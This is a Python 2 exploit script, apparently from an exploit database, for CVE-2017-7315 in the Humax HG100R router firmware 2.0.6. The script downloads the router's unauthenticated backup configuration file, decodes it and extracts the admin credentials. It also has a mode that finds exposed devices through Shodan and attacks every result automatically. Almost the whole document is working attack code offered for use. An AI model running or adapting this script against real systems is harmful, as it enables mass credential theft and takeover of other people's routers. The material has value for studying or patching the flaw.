###########################

# Humax HG100R 2.0.6 Backup File Download Vulnerability

###########################

# coding: utf-8
 
# Exploit Title: Humax Backup file download
# Date: 29/06/2017
# Exploit Author: gambler
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-7315
 
import sys
import base64
import shodan
import requests
import subprocess
 
def banner():
    print '''
 âââ ââ  â    ââ  ââââ âââââ âââ      âââ   âââ
ââââ âââ ââ  âââââââââââ âââââââââ    ââ â â ââ
âââââââââââ  âââââââ    âââââââ  âââ  ââ  â   â
âââ âââ âââ  âââââââ    âââ âââââââââ  â â â â
ââââââââââââââââ ââââ   ââââ ââ   ââââââââ ââââ
 â âââââââââ â â â ââ   â  â ââ   ââââââ â ââ â
 â âââ âââââ â â â  â      â  â   ââ âââ   ââ â
 â  ââ â âââ â â â      â     â   â    â    â
 â  â  â   â            â         â  â â    â
    '''
    print 'Description: Humax HG100R backup file download'
    print 'Software Version: VER 2.0.6'
    print 'SDK Version: 5.7.1mp1'
    print 'IPv6 Stack Version: 1.2.2'
    print 'Author: Gambler'
    print 'Vulnerability founded: 14/03/2016'
    print 'CVE: waiting'
    print
 
def xplHelp():
    print 'Exploit syntax error, Example:'
    print 'python xpl.py http://192.168.0.1'
 
def exploit(server):
    path = '/view/basic/GatewaySettings.bin'
    if not server.startswith('http'):
        server = 'http://%s' % server
    if server.endswith('/'):
        server = server[:-1]+''
    url = '%s/%s' %(server,path)
    print '[+] - Downloading configuration file and decoding'
    try:
        r = requests.get(url, stream=True,timeout=10)
        for chunk in r.iter_content(chunk_size=1024):
            if chunk:
                rawdata = r.content
        save(rawdata)
    except:
        pass
 
def save(rawdata):
    config = base64.b64decode(rawdata).decode('ascii','ignore').replace('^@','')
    open('config.txt', 'w').write(config)
    print '[+] - Done, file saved as config.txt'
    infos = subprocess.Popen(["strings config.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0]
    print '[+] - Credentials found'
    print infos
 
def shodanSearch():
    SHODAN_API_KEY = "SHODAN_API_KEY"
    api = shodan.Shodan(SHODAN_API_KEY)
    try:
            results = api.search('Copyright © 2014 HUMAX Co., Ltd. All rights reserved.')
            print 'Results found: %s' % results['total']
            for result in results['matches']:
                    router = 'http://%s:%s' % (result['ip_str'],result['port'])
                    print router
                    exploit(router)
    except shodan.APIError, e:
            print 'Error: %s' % e
 
 
if __name__ == '__main__':
 
    if len(sys.argv) < 2:
        xplHelp()
        sys.exit()
    banner()
    if sys.argv[1] == 'shodan':
        shodanSearch()
    else:
        exploit(sys.argv[1])

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-07-08]

###########################